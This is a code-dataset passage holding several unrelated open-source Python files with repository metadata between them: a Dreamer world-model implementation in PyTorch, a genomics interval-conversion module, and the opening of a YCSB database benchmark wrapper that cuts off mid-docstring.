# delta_t = stop -start
fout.write("- Time consuming:\n")
fout.write(" - job starts at %s\n" % start)
#if self.job_done == True:
# fout.write(" - totally %.1f seconds, or %.3f minutes or %.5f hours\n" % (delta_t.total_seconds(), delta_t.total_seconds()/60, delta_t.total_seconds()/3600))
#else:
# fout.write(" - job is not finished yet, but it starts at %s\n" % start)
# end the time information
for item in self.run_info:
fout.write("- %s: %s\n" % (item, str(self.run_info[item])))
fout.write("## 运行信息图示\n")
fout.write("Iterations per SCF\n")
fout.write("\n")
fout.write("Total energies per SCF\n")
fout.write("\n")
fout.write("Fermi energies per SCF\n")
fout.write("\n")
fout.write("Total forces per SCF\n")
fout.write("\n")
def export(self):
"""
Note:
* will only printout the final structure if the job is done
"""
self.print_trajectory()
self.plot_run_info()
self.markdown_report("MolecularDyanamicsport.md")
| 45.41841
| 184
| 0.532289
|
a80601d924a26c8803353ee345b114fe209f940a
| 20,873
|
py
|
Python
|
models.py
|
zplizzi/dreamer-pytorch
|
582d534023c4e145489d59915c16e19d054d91b0
|
[
"MIT"
] | null | null | null |
models.py
|
zplizzi/dreamer-pytorch
|
582d534023c4e145489d59915c16e19d054d91b0
|
[
"MIT"
] | null | null | null |
models.py
|
zplizzi/dreamer-pytorch
|
582d534023c4e145489d59915c16e19d054d91b0
|
[
"MIT"
] | null | null | null |
from typing import List, Tuple
from typing import Optional
from torch import Tensor
import numpy as np
import torch
import torch.distributions
from einops import rearrange
from torch import jit
from torch import nn
from torch.distributions.normal import Normal
from torch.distributions.transformed_distribution import TransformedDistribution
from torch.nn import functional as F
def bottle(f, x_tuple):
"""Adapts inputs with shape (T, B, ...) to work with a function f expecting shape (B, ...).
TODO: this might be clearer as a function wrapper."""
T, B = x_tuple[0].shape[:2]
x_tuple = (rearrange(x, "t b ... -> (t b) ...", t=T, b=B) for x in x_tuple)
y = f(*x_tuple)
return rearrange(y, "(t b) ... -> t b ...", t=T, b=B)
class TransitionModel(jit.ScriptModule):
__constants__ = ["min_std_dev"]
def __init__(
self,
belief_size,
state_size,
action_size,
hidden_size,
embedding_size,
activation_function="relu",
min_std_dev=0.1,
):
super().__init__()
self.min_std_dev = min_std_dev
self.fc_embed_state_action = nn.Linear(state_size + action_size, belief_size)
self.rnn = nn.GRUCell(belief_size, belief_size)
self.fc_embed_belief_prior = nn.Linear(belief_size, hidden_size)
self.fc_state_prior = nn.Linear(hidden_size, 2 * state_size)
self.fc_embed_belief_posterior = nn.Linear(belief_size + embedding_size, hidden_size)
self.fc_state_posterior = nn.Linear(hidden_size, 2 * state_size)
self.modules = [
self.fc_embed_state_action,
self.fc_embed_belief_prior,
self.fc_state_prior,
self.fc_embed_belief_posterior,
self.fc_state_posterior,
]
# Operates over (previous) state, (previous) actions, (previous) belief, (previous) nonterminals (mask), and (current) observations
# Diagram of expected inputs and outputs for T = 5 (-x- signifying beginning of output belief/state that gets sliced off):
# t : 0 1 2 3 4 5
# o : -X--X--X--X--X-
# a : -X--X--X--X--X-
# n : -X--X--X--X--X-
# pb: -X-
# ps: -X-
# b : -x--X--X--X--X--X-
# s : -x--X--X--X--X--X-
# @jit.script_method
# def forward(
# self,
# prev_state: torch.Tensor,
# actions: torch.Tensor,
# prev_belief: torch.Tensor,
# enc_observations: torch.Tensor,
# nonterminals: torch.Tensor,
# ):
# """
# Computes transitions for an entire sequence.
# If enc_observations is given, "training mode" is used where the state posterior is the base of the next
# timestep. Else, in "test mode", the prior is rolled out.
#
# Input: init_belief, init_state: torch.Size([50, 200]) torch.Size([50, 30])
# Output: beliefs, prior_states, prior_means, prior_std_devs, posterior_states, posterior_means, posterior_std_devs
# torch.Size([49, 50, 200]) torch.Size([49, 50, 30]) torch.Size([49, 50, 30]) torch.Size([49, 50, 30]) torch.Size([49, 50, 30]) torch.Size([49, 50, 30]) torch.Size([49, 50, 30])
# """
# # Create lists for hidden states (cannot use single tensor as buffer because autograd won't work with inplace writes)
# T = actions.size(0) + 1
# # beliefs, prior_states, prior_means, prior_std_devs, posterior_states, posterior_means, posterior_std_devs = (
# # [torch.empty(0)] * T,
# # [torch.empty(0)] * T,
# # [torch.empty(0)] * T,
# # [torch.empty(0)] * T,
# # [torch.empty(0)] * T,
# # [torch.empty(0)] * T,
# # [torch.empty(0)] * T,
# # )
#
# beliefs = []
# posterior_means = []
# posterior_std_devs = []
# posterior_states = []
#
# beliefs.append(prev_belief)
# posterior_states.append(prev_state)
#
# # beliefs[0], prior_states[0], posterior_states[0] = prev_belief, prev_state, prev_state
# # for t in range(T - 1):
# for t in range(10):
# # Select appropriate previous state
# _state = posterior_states[-1]
# # Set _state to 0 if previous transition was terminal
# _state = _state * nonterminals[t]
#
# # Compute belief (deterministic hidden state)
# # This if f in the paper.
# # "beliefs" is h_t in the paper
# hidden = F.elu(self.fc_embed_state_action(torch.cat((_state, actions[t]), dim=1)))
# belief = self.rnn(hidden, beliefs[-1])
#
# # Compute state prior by applying transition dynamics.
# # This is the "stochastic state model" or "prior" in the paper
# # The prior has no info on the actual observation.
# # TODO: pull this out of the loop and batch it all at the end
# # hidden = F.elu(self.fc_embed_belief_prior(beliefs[t + 1]))
# # prior_means[t + 1], _prior_std_dev = torch.chunk(self.fc_state_prior(hidden), 2, dim=1)
# # prior_std_devs[t + 1] = F.softplus(_prior_std_dev) + self.min_std_dev
# # prior_states[t + 1] = prior_means[t + 1] + prior_std_devs[t + 1] * torch.randn_like(prior_means[t + 1])
#
# # Compute state posterior by applying transition dynamics and using current observation
# # This is the "encoder" or "posterior" in the paper
# # The posterior differs from the prior in that it also sees the observation.
# # Use t_ to deal with different time indexing for observations
# t_ = t - 1
# hidden = F.elu(
# self.fc_embed_belief_posterior(torch.cat([belief, enc_observations[t_ + 1]], dim=1))
# )
# posterior_mean, _posterior_std_dev = torch.chunk(self.fc_state_posterior(hidden), 2, dim=1)
# posterior_std_dev = F.softplus(_posterior_std_dev) + self.min_std_dev
# posterior_state = posterior_mean + posterior_std_dev #* torch.randn_like(posterior_mean)
#
# posterior_states.append(posterior_state)
# posterior_means.append(posterior_mean)
# posterior_std_devs.append(posterior_std_dev)
# beliefs.append(belief)
#
# # Return new hidden states
# return (
# torch.stack(beliefs[1:], dim=0),
# # torch.stack(prior_states[1:], dim=0),
# # torch.stack(prior_means[1:], dim=0),
# # torch.stack(prior_std_devs[1:], dim=0),
# torch.stack(posterior_states[1:], dim=0),
# torch.stack(posterior_means[1:], dim=0),
# torch.stack(posterior_std_devs[1:], dim=0),
# )
def forward(
self,
prev_state: torch.Tensor,
actions: torch.Tensor,
prev_belief: torch.Tensor,
enc_observations: Optional[torch.Tensor] = None,
nonterminals: Optional[torch.Tensor] = None,
) -> List[torch.Tensor]:
"""
Computes transitions for an entire sequence.
If enc_observations is given, "training mode" is used where the state posterior is the base of the next
timestep. Else, in "test mode", the prior is rolled out.
Input: init_belief, init_state: torch.Size([50, 200]) torch.Size([50, 30])
Output: beliefs, prior_states, prior_means, prior_std_devs, posterior_states, posterior_means, posterior_std_devs
torch.Size([49, 50, 200]) torch.Size([49, 50, 30]) torch.Size([49, 50, 30]) torch.Size([49, 50, 30]) torch.Size([49, 50, 30]) torch.Size([49, 50, 30]) torch.Size([49, 50, 30])
"""
# Create lists for hidden states (cannot use single tensor as buffer because autograd won't work with inplace writes)
T = actions.size(0) + 1
beliefs, prior_states, prior_means, prior_std_devs, posterior_states, posterior_means, posterior_std_devs = (
[torch.empty(0)] * T,
[torch.empty(0)] * T,
[torch.empty(0)] * T,
[torch.empty(0)] * T,
[torch.empty(0)] * T,
[torch.empty(0)] * T,
[torch.empty(0)] * T,
)
beliefs[0], prior_states[0], posterior_states[0] = prev_belief, prev_state, prev_state
for t in range(T - 1):
# Select appropriate previous state
_state = prior_states[t] if enc_observations is None else posterior_states[t]
# Set _state to 0 if previous transition was terminal
_state = _state if nonterminals is None else _state * nonterminals[t]
# Compute belief (deterministic hidden state)
# This if f in the paper.
# "beliefs" is h_t in the paper
hidden = F.elu(self.fc_embed_state_action(torch.cat([_state, actions[t]], dim=1)))
beliefs[t + 1] = self.rnn(hidden, beliefs[t])
# Compute state prior by applying transition dynamics.
# This is the "stochastic state model" or "prior" in the paper
# The prior has no info on the actual observation.
hidden = F.elu(self.fc_embed_belief_prior(beliefs[t + 1]))
prior_means[t + 1], _prior_std_dev = torch.chunk(self.fc_state_prior(hidden), 2, dim=1)
prior_std_devs[t + 1] = F.softplus(_prior_std_dev) + self.min_std_dev
prior_states[t + 1] = prior_means[t + 1] + prior_std_devs[t + 1] * torch.randn_like(prior_means[t + 1])
if enc_observations is not None:
# Compute state posterior by applying transition dynamics and using current observation
# This is the "encoder" or "posterior" in the paper
# The posterior differs from the prior in that it also sees the observation.
# Use t_ to deal with different time indexing for observations
t_ = t - 1
hidden = F.elu(
self.fc_embed_belief_posterior(torch.cat([beliefs[t + 1], enc_observations[t_ + 1]], dim=1))
)
posterior_means[t + 1], _posterior_std_dev = torch.chunk(self.fc_state_posterior(hidden), 2, dim=1)
posterior_std_devs[t + 1] = F.softplus(_posterior_std_dev) + self.min_std_dev
posterior_states[t + 1] = posterior_means[t + 1] + posterior_std_devs[t + 1] * torch.randn_like(
posterior_means[t + 1]
)
# Return new hidden states
hidden = [
torch.stack(beliefs[1:], dim=0),
torch.stack(prior_states[1:], dim=0),
torch.stack(prior_means[1:], dim=0),
torch.stack(prior_std_devs[1:], dim=0),
]
if enc_observations is not None:
hidden += [
torch.stack(posterior_states[1:], dim=0),
torch.stack(posterior_means[1:], dim=0),
torch.stack(posterior_std_devs[1:], dim=0),
]
return hidden
class SymbolicObservationModel(jit.ScriptModule):
def __init__(self, observation_size, belief_size, state_size, embedding_size, activation_function="relu"):
super().__init__()
self.act_fn = getattr(F, activation_function)
self.fc1 = nn.Linear(belief_size + state_size, embedding_size)
self.fc2 = nn.Linear(embedding_size, embedding_size)
self.fc3 = nn.Linear(embedding_size, observation_size)
self.modules = [self.fc1, self.fc2, self.fc3]
@jit.script_method
def forward(self, belief, state):
hidden = self.act_fn(self.fc1(torch.cat([belief, state], dim=1)))
hidden = self.act_fn(self.fc2(hidden))
observation = self.fc3(hidden)
return observation
class VisualObservationModel(jit.ScriptModule):
__constants__ = ["embedding_size"]
def __init__(self, belief_size, state_size, embedding_size, activation_function="relu"):
super().__init__()
self.act_fn = getattr(F, activation_function)
self.embedding_size = embedding_size
self.fc1 = nn.Linear(belief_size + state_size, embedding_size)
self.conv1 = nn.ConvTranspose2d(embedding_size, 128, 5, stride=2)
self.conv2 = nn.ConvTranspose2d(128, 64, 5, stride=2)
self.conv3 = nn.ConvTranspose2d(64, 32, 6, stride=2)
self.conv4 = nn.ConvTranspose2d(32, 3, 6, stride=2)
self.modules = [self.fc1, self.conv1, self.conv2, self.conv3, self.conv4]
@jit.script_method
def forward(self, belief, state):
# No nonlinearity here
hidden = self.fc1(torch.cat([belief, state], dim=1))
hidden = hidden.view(-1, self.embedding_size, 1, 1)
hidden = self.act_fn(self.conv1(hidden))
hidden = self.act_fn(self.conv2(hidden))
hidden = self.act_fn(self.conv3(hidden))
observation = self.conv4(hidden)
return observation
def ObservationModel(symbolic, observation_size, belief_size, state_size, embedding_size, activation_function="relu"):
if symbolic:
return SymbolicObservationModel(observation_size, belief_size, state_size, embedding_size, activation_function)
else:
return VisualObservationModel(belief_size, state_size, embedding_size, activation_function)
class RewardModel(jit.ScriptModule):
def __init__(self, belief_size, state_size, hidden_size, activation_function="relu"):
# [--belief-size: 200, --hidden-size: 200, --state-size: 30]
super().__init__()
self.act_fn = getattr(F, activation_function)
self.fc1 = nn.Linear(belief_size + state_size, hidden_size)
self.fc2 = nn.Linear(hidden_size, hidden_size)
self.fc3 = nn.Linear(hidden_size, 1)
self.modules = [self.fc1, self.fc2, self.fc3]
@jit.script_method
def forward(self, belief, state):
x = torch.cat([belief, state], dim=1)
hidden = self.act_fn(self.fc1(x))
hidden = self.act_fn(self.fc2(hidden))
reward = self.fc3(hidden).squeeze(dim=1)
return reward
class ValueModel(jit.ScriptModule):
def __init__(self, belief_size, state_size, hidden_size, activation_function="relu"):
super().__init__()
self.act_fn = getattr(F, activation_function)
self.fc1 = nn.Linear(belief_size + state_size, hidden_size)
self.fc2 = nn.Linear(hidden_size, hidden_size)
self.fc3 = nn.Linear(hidden_size, hidden_size)
self.fc4 = nn.Linear(hidden_size, 1)
self.modules = [self.fc1, self.fc2, self.fc3, self.fc4]
@jit.script_method
def forward(self, belief, state):
x = torch.cat([belief, state], dim=1)
hidden = self.act_fn(self.fc1(x))
hidden = self.act_fn(self.fc2(hidden))
hidden = self.act_fn(self.fc3(hidden))
reward = self.fc4(hidden).squeeze(dim=1)
return reward
class ActorModel(jit.ScriptModule):
def __init__(
self,
belief_size,
state_size,
hidden_size,
action_size,
dist="tanh_normal",
activation_function="elu",
min_std=1e-4,
init_std=5,
mean_scale=5,
):
super().__init__()
self.act_fn = getattr(F, activation_function)
self.fc1 = nn.Linear(belief_size + state_size, hidden_size)
self.fc2 = nn.Linear(hidden_size, hidden_size)
self.fc3 = nn.Linear(hidden_size, hidden_size)
self.fc4 = nn.Linear(hidden_size, hidden_size)
self.fc5 = nn.Linear(hidden_size, 2 * action_size)
self.modules = [self.fc1, self.fc2, self.fc3, self.fc4, self.fc5]
self._dist = dist
self._min_std = min_std
self._init_std = init_std
self._mean_scale = mean_scale
@jit.script_method
def forward(self, belief, state):
raw_init_std = torch.log(torch.exp(self._init_std) - 1)
x = torch.cat([belief, state], dim=1)
hidden = self.act_fn(self.fc1(x))
hidden = self.act_fn(self.fc2(hidden))
hidden = self.act_fn(self.fc3(hidden))
hidden = self.act_fn(self.fc4(hidden))
action = self.fc5(hidden).squeeze(dim=1)
action_mean, action_std_dev = torch.chunk(action, 2, dim=1)
# TODO: why tanh here? are the valid actions in (-1, 1)? probably
action_mean = self._mean_scale * torch.tanh(action_mean / self._mean_scale)
action_std = F.softplus(action_std_dev + raw_init_std) + self._min_std
return action_mean, action_std
def get_action(self, belief, state, det=False):
action_mean, action_std = self.forward(belief, state)
# TODO: understand+simplify this
dist = Normal(action_mean, action_std)
dist = TransformedDistribution(dist, TanhBijector())
dist = torch.distributions.Independent(dist, 1)
dist = SampleDist(dist)
if det:
return dist.mode()
else:
return dist.rsample()
class SymbolicEncoder(jit.ScriptModule):
def __init__(self, observation_size, embedding_size, activation_function="relu"):
super().__init__()
self.act_fn = getattr(F, activation_function)
self.fc1 = nn.Linear(observation_size, embedding_size)
self.fc2 = nn.Linear(embedding_size, embedding_size)
self.fc3 = nn.Linear(embedding_size, embedding_size)
self.modules = [self.fc1, self.fc2, self.fc3]
@jit.script_method
def forward(self, observation):
hidden = self.act_fn(self.fc1(observation))
hidden = self.act_fn(self.fc2(hidden))
hidden = self.fc3(hidden)
return hidden
# TODO: isn't the encoder supposed to have a sampling step?
class VisualEncoder(jit.ScriptModule):
__constants__ = ["embedding_size"]
def __init__(self, embedding_size, activation_function="relu"):
super().__init__()
self.act_fn = getattr(F, activation_function)
self.embedding_size = embedding_size
self.conv1 = nn.Conv2d(3, 32, 4, stride=2)
self.conv2 = nn.Conv2d(32, 64, 4, stride=2)
self.conv3 = nn.Conv2d(64, 128, 4, stride=2)
self.conv4 = nn.Conv2d(128, 256, 4, stride=2)
# TODO: huh
self.fc = nn.Identity() if embedding_size == 1024 else nn.Linear(1024, embedding_size)
self.modules = [self.conv1, self.conv2, self.conv3, self.conv4]
@jit.script_method
def forward(self, observation):
hidden = self.act_fn(self.conv1(observation))
hidden = self.act_fn(self.conv2(hidden))
hidden = self.act_fn(self.conv3(hidden))
hidden = self.act_fn(self.conv4(hidden))
hidden = hidden.view(-1, 1024)
hidden = self.fc(hidden) # Identity if embedding size is 1024 else linear projection
return hidden
def Encoder(symbolic, observation_size, embedding_size, activation_function="relu"):
if symbolic:
return SymbolicEncoder(observation_size, embedding_size, activation_function)
else:
return VisualEncoder(embedding_size, activation_function)
# "atanh", "TanhBijector" and "SampleDist" are from the following repo
# https://github.com/juliusfrost/dreamer-pytorch
def atanh(x):
return 0.5 * torch.log((1 + x) / (1 - x))
class TanhBijector(torch.distributions.Transform):
def __init__(self):
super().__init__()
self.bijective = True
self.domain = torch.distributions.constraints.real
self.codomain = torch.distributions.constraints.interval(-1.0, 1.0)
@property
def sign(self):
return 1.0
def _call(self, x):
return torch.tanh(x)
def _inverse(self, y: torch.Tensor):
y = torch.where((torch.abs(y) <= 1.0), torch.clamp(y, -0.99999997, 0.99999997), y)
y = atanh(y)
return y
def log_abs_det_jacobian(self, x, y):
return 2.0 * (np.log(2) - x - F.softplus(-2.0 * x))
class SampleDist:
def __init__(self, dist, samples=100):
self._dist = dist
self._samples = samples
@property
def name(self):
return "SampleDist"
def __getattr__(self, name):
return getattr(self._dist, name)
def mean(self):
sample = dist.rsample()
return torch.mean(sample, 0)
def mode(self):
dist = self._dist.expand((self._samples, *self._dist.batch_shape))
sample = dist.rsample()
logprob = dist.log_prob(sample)
batch_size = sample.size(1)
feature_size = sample.size(2)
indices = torch.argmax(logprob, dim=0).reshape(1, batch_size, 1).expand(1, batch_size, feature_size)
return torch.gather(sample, 0, indices).squeeze(0)
def entropy(self):
dist = self._dist.expand((self._samples, *self._dist.batch_shape))
sample = dist.rsample()
logprob = dist.log_prob(sample)
return -torch.mean(logprob, 0)
def sample(self):
return self._dist.sample()
| 42.597959
| 193
| 0.621904
|
e09ec15d26c708a9cc3d72354e0fd70a756d4349
| 3,922
|
py
|
Python
|
chanjo/converter/stages.py
|
nuin/chanjo
|
9a1b4aa247c3fe5bf150ac24952d04be43befaa1
|
[
"MIT"
] | null | null | null |
chanjo/converter/stages.py
|
nuin/chanjo
|
9a1b4aa247c3fe5bf150ac24952d04be43befaa1
|
[
"MIT"
] | null | null | null |
chanjo/converter/stages.py
|
nuin/chanjo
|
9a1b4aa247c3fe5bf150ac24952d04be43befaa1
|
[
"MIT"
] | 1
|
2018-07-18T14:56:09.000Z
|
2018-07-18T14:56:09.000Z
|
# -*- coding: utf-8 -*-
"""
chanjo.converter.stages
~~~~~~~~~~~~~~~~~~~~~~~~
Pipeline stages only used by the Chanjo converter.
"""
from __future__ import absolute_import
from operator import attrgetter
from toolz import curry, mapcat
from ..utils import BaseInterval
@curry
def grep(pattern, string):
"""Match a simple pattern substring in a given string.
Note that the function would also work to check for an item in a list,
a key in a dictionary etc.
Args:
pattern (str): substring to match with
string (str): string to match against
Returns:
bool: if ``pattern`` was a substring in ``string``
"""
return pattern in string
def parse_raw_intervals(str_list):
"""Decode serialized CCDS exons.
Accepts a formatted string of interval coordinates from the CCDS
row and turns it into a more manageable list of lists with
(start, end) coordinates for each interval (exon).
.. code-block:: python
>>> parse_raw_intervals('[11-18, 25-30, 32-35]')
[[11, 18], [25, 30], [32, 35]]
Args:
str_list (str): A CSV string of (start, end) pairs, wrapped in '[]'
Returns:
list: 2D list with the start ``int``, end ``int`` pairs
"""
# remove the "[]"
csv_intervals = str_list[1:-1].replace(' ', '')
# 1. split first into exons coordinates
# 2. split into start, end and parse int
intervals = [[int(pos) for pos in item.split('-')]
for item in csv_intervals.split(',')]
return intervals
def extract_intervals(record):
"""Compile an BaseInterval from a single (split) CCDS record row.
Args:
record (tuple): split CCDS row
Yields:
BaseInterval: namedtuple class representation of an interval
"""
# extract contig Id as string
contig = record[0]
# parse the intervals list-string and yield each of the intervals
for start, end in parse_raw_intervals(record[9]):
yield BaseInterval(
contig, # contig
start, # start
end, # end
"%s-%d-%d" % (contig, start, end), # unique id
0, # score, unused but required
record[6], # strand
[record[4]], # block ids
[record[2]] # superblock ids
)
def rename_sex_interval(interval, sex_contigs=('X', 'Y')):
"""Rename interval ids for intervals on sex chromosomes.
Doesn't do anything but return non-sex interval.
The need for this step is that 20 superblocks are present on both sex
chromosomes (X and Y). However, corresponding intervals should still
be treated as if they wheren't really homologos.
Args:
interval (tuple): tuple representation of an interval
Returns:
BaseInterval: namedtuple representation of an interval
"""
contig = interval.contig
if contig in sex_contigs:
# keep the funtion pure, avoid altering input object!
return interval._replace(
block_ids=["%s-%s" % (contig, block_id)
for block_id in interval.block_ids],
superblock_ids=["%s-%s" % (contig, superblock_id)
for superblock_id in interval.superblock_ids]
)
else:
return interval
def merge_related_elements(interval_group):
"""Merge block and superblock ids for a group of identical intervals.
Args:
interval_group (list): list of identical intervals
Returns:
BaseInterval: unified interval with merged related element ids
"""
# extract block and superblock ids from each of the intervals
block_ids = mapcat(attrgetter('block_ids'), interval_group)
superblock_ids = mapcat(attrgetter('superblock_ids'), interval_group)
return BaseInterval(
*interval_group[0][:6], # use first interval as base
block_ids=list(block_ids), # resolve and add
superblock_ids=list(superblock_ids) # do
)
| 28.838235
| 72
| 0.642784
|
d454e7eaa77072fbe095e6672c3b95619dd22c66
| 45,082
|
py
|
Python
|
perfkitbenchmarker/linux_packages/ycsb.py
|
dPhanekham/PerfKitBenchmarker
|
e9fe13fb826ef875d3100c164a50dac638b756c3
|
[
"Apache-2.0"
] | null | null | null |
perfkitbenchmarker/linux_packages/ycsb.py
|
dPhanekham/PerfKitBenchmarker
|
e9fe13fb826ef875d3100c164a50dac638b756c3
|
[
"Apache-2.0"
] | 1
|
2021-03-26T00:41:05.000Z
|
2021-03-26T00:41:05.000Z
|
perfkitbenchmarker/linux_packages/ycsb.py
|
sachinpatkar/PerfKitBenchmarker
|
ed2898278244d71501de87bb181d50b3561dcf44
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2016 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Install, execute, and parse results from YCSB.
YCSB (the Yahoo! Cloud Serving Benchmark) is a common method of comparing NoSQL
database performance.
https://github.com/brianfrankcooper/YCSB
For PerfKitBenchmarker, we wrap YCSB to:
* Pre-load a database with a fixed number of records.
* Execute a collection of workloads under a staircase load.
* Parse the results into PerfKitBenchmarker samples.
The 'YCSBExecutor' class handles executing YCSB on a collection of client VMs.
Generally, clients just need this class. For example, to run against
HBase 1.0:
>>> executor = ycsb.YCSBExecutor('hbase-10')
>>> samples = executor.LoadAndRun(loader_vms)
By default, this runs YCSB workloads A and B against the database, 32 threads
per client VM, with an initial database size of 1GB (1k records).
Each workload runs for at most 30 minutes.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import bisect
import collections
import copy
import csv
import itertools
import json
import logging
import math
import operator
import os
import posixpath
import re
import time
from perfkitbenchmarker import data
from perfkitbenchmarker import errors
from perfkitbenchmarker import events
from perfkitbenchmarker import flags
from perfkitbenchmarker import sample
from perfkitbenchmarker import vm_util
from perfkitbenchmarker.linux_packages import INSTALL_DIR
import six
from six.moves import filter
from six.moves import range
from six.moves import zip
FLAGS = flags.FLAGS
YCSB_DIR = posixpath.join(INSTALL_DIR, 'ycsb')
YCSB_EXE = posixpath.join(YCSB_DIR, 'bin', 'ycsb')
HDRHISTOGRAM_DIR = posixpath.join(INSTALL_DIR, 'hdrhistogram')
HDRHISTOGRAM_TAR_URL = ('https://github.com/HdrHistogram/HdrHistogram/archive/'
'HdrHistogram-2.1.10.tar.gz')
HDRHISTOGRAM_GROUPS = ['READ', 'UPDATE']
_DEFAULT_PERCENTILES = 50, 75, 90, 95, 99, 99.9
HISTOGRAM = 'histogram'
HDRHISTOGRAM = 'hdrhistogram'
TIMESERIES = 'timeseries'
YCSB_MEASUREMENT_TYPES = [HISTOGRAM, HDRHISTOGRAM, TIMESERIES]
# Binary operators to aggregate reported statistics.
# Statistics with operator 'None' will be dropped.
AGGREGATE_OPERATORS = {
'Operations': operator.add,
'RunTime(ms)': max,
'Return=0': operator.add,
'Return=-1': operator.add,
'Return=-2': operator.add,
'Return=-3': operator.add,
'Return=OK': operator.add,
'Return=ERROR': operator.add,
'LatencyVariance(ms)': None,
'AverageLatency(ms)': None, # Requires both average and # of ops.
'Throughput(ops/sec)': operator.add,
'95thPercentileLatency(ms)': None, # Calculated across clients.
'99thPercentileLatency(ms)': None, # Calculated across clients.
'MinLatency(ms)': min,
'MaxLatency(ms)': max}
flags.DEFINE_string('ycsb_version', '0.9.0', 'YCSB version to use. Defaults to '
'version 0.9.0.')
flags.DEFINE_enum('ycsb_measurement_type', HISTOGRAM,
YCSB_MEASUREMENT_TYPES,
'Measurement type to use for ycsb. Defaults to histogram.')
flags.DEFINE_enum('ycsb_measurement_interval', 'op',
['op', 'intended', 'both'],
'Measurement interval to use for ycsb. Defaults to op.')
flags.DEFINE_boolean('ycsb_histogram', False, 'Include individual '
'histogram results from YCSB (will increase sample '
'count).')
flags.DEFINE_boolean('ycsb_load_samples', True, 'Include samples '
'from pre-populating database.')
flags.DEFINE_boolean('ycsb_include_individual_results', False,
'Include results from each client VM, rather than just '
'combined results.')
flags.DEFINE_boolean('ycsb_reload_database', True,
'Reload database, othewise skip load stage. '
'Note, this flag is only used if the database '
'is already loaded.')
flags.DEFINE_integer('ycsb_client_vms', 1, 'Number of YCSB client VMs.')
flags.DEFINE_list('ycsb_workload_files', ['workloada', 'workloadb'],
'Path to YCSB workload file to use during *run* '
'stage only. Comma-separated list')
flags.DEFINE_list('ycsb_load_parameters', [],
'Passed to YCSB during the load stage. Comma-separated list '
'of "key=value" pairs.')
flags.DEFINE_list('ycsb_run_parameters', [],
'Passed to YCSB during the load stage. Comma-separated list '
'of "key=value" pairs.')
flags.DEFINE_list('ycsb_threads_per_client', ['32'], 'Number of threads per '
'loader during the benchmark run. Specify a list to vary the '
'number of clients.')
flags.DEFINE_integer('ycsb_preload_threads', None, 'Number of threads per '
'loader during the initial data population stage. '
'Default value depends on the target DB.')
flags.DEFINE_integer('ycsb_record_count', None, 'Pre-load with a total '
'dataset of records total. Overrides recordcount value in '
'all workloads of this run. Defaults to None, where '
'recordcount value in each workload is used. If neither '
'is not set, ycsb default of 0 is used.')
flags.DEFINE_integer('ycsb_operation_count', None, 'Number of operations '
'*per client VM*.')
flags.DEFINE_integer('ycsb_timelimit', 1800, 'Maximum amount of time to run '
'each workload / client count combination. Set to 0 for '
'unlimited time.')
flags.DEFINE_integer('ycsb_field_count', None, 'Number of fields in a record. '
'Defaults to None which uses the ycsb default of 10.')
flags.DEFINE_integer('ycsb_field_length', None, 'Size of each field. Defaults '
'to None which uses the ycsb default of 100.')
flags.DEFINE_enum('ycsb_requestdistribution',
None, ['uniform', 'zipfian', 'latest'],
'Type of request distribution. '
'This will overwrite workload file parameter')
flags.DEFINE_float('ycsb_readproportion',
None,
'The read proportion, '
'Default is 0.5 in workloada and 0.95 in YCSB.')
flags.DEFINE_float('ycsb_updateproportion',
None,
'The update proportion, '
'Default is 0.5 in workloada and 0.05 in YCSB.')
flags.DEFINE_float('ycsb_scanproportion',
None,
'The scan proportion, '
'Default is 0 in workloada and 0 in YCSB.')
# Default loading thread count for non-batching backends.
DEFAULT_PRELOAD_THREADS = 32
def _GetVersionIndex(version_str):
"""Returns the version index from ycsb version string.
Args:
version_str: ycsb version string with format '0.<version index>.0'.
Returns:
(int) version index.
"""
return int(version_str.split('.')[1])
def _GetThreadsPerLoaderList():
"""Returns the list of client counts per VM to use in staircase load."""
return [int(thread_count) for thread_count in FLAGS.ycsb_threads_per_client]
def _GetWorkloadFileList():
"""Returns the list of workload files to run.
Returns:
In order of preference:
* The argument to --ycsb_workload_files.
* Bundled YCSB workloads A and B.
"""
return [data.ResourcePath(workload)
for workload in FLAGS.ycsb_workload_files]
def CheckPrerequisites():
for workload_file in _GetWorkloadFileList():
if not os.path.exists(workload_file):
raise IOError('Missing workload file: {0}'.format(workload_file))
if FLAGS.ycsb_measurement_type == HDRHISTOGRAM:
if _GetVersionIndex(FLAGS.ycsb_version) < 11:
raise errors.Config.InvalidValue('hdrhistogram not supported on earlier '
'ycsb versions.')
def _Install(vm):
"""Installs the YCSB and, if needed, hdrhistogram package on the VM."""
vm.Install('openjdk')
vm.Install('curl')
ycsb_url = ('https://github.com/brianfrankcooper/YCSB/releases/'
'download/{0}/ycsb-{0}.tar.gz').format(FLAGS.ycsb_version)
install_cmd = ('mkdir -p {0} && curl -L {1} | '
'tar -C {0} --strip-components=1 -xzf -')
vm.RemoteCommand(install_cmd.format(YCSB_DIR, ycsb_url))
if _GetVersionIndex(FLAGS.ycsb_version) >= 11:
vm.RemoteCommand(install_cmd.format(HDRHISTOGRAM_DIR, HDRHISTOGRAM_TAR_URL))
vm.RemoteCommand('sudo apt-get --assume-yes install maven > /dev/null 2>&1')
# _JAVA_OPTIONS needed to work around this issue:
# https://stackoverflow.com/questions/53010200/maven-surefire-could-not-find-forkedbooter-class
vm.RemoteCommand('cd {0}; _JAVA_OPTIONS=-Djdk.net.URLClassPath.'
'disableClassPathURLCheck=true '
'mvn install > /dev/null 2>&1'.format(
HDRHISTOGRAM_DIR))
def YumInstall(vm):
"""Installs the YCSB package on the VM."""
_Install(vm)
def AptInstall(vm):
"""Installs the YCSB package on the VM."""
_Install(vm)
def ParseResults(ycsb_result_string, data_type='histogram'):
"""Parse YCSB results.
Example input for histogram datatype:
YCSB Client 0.1
Command line: -db com.yahoo.ycsb.db.HBaseClient -P /tmp/pkb/workloada
[OVERALL], RunTime(ms), 1800413.0
[OVERALL], Throughput(ops/sec), 2740.503428935472
[UPDATE], Operations, 2468054
[UPDATE], AverageLatency(us), 2218.8513395574005
[UPDATE], MinLatency(us), 554
[UPDATE], MaxLatency(us), 352634
[UPDATE], 95thPercentileLatency(ms), 4
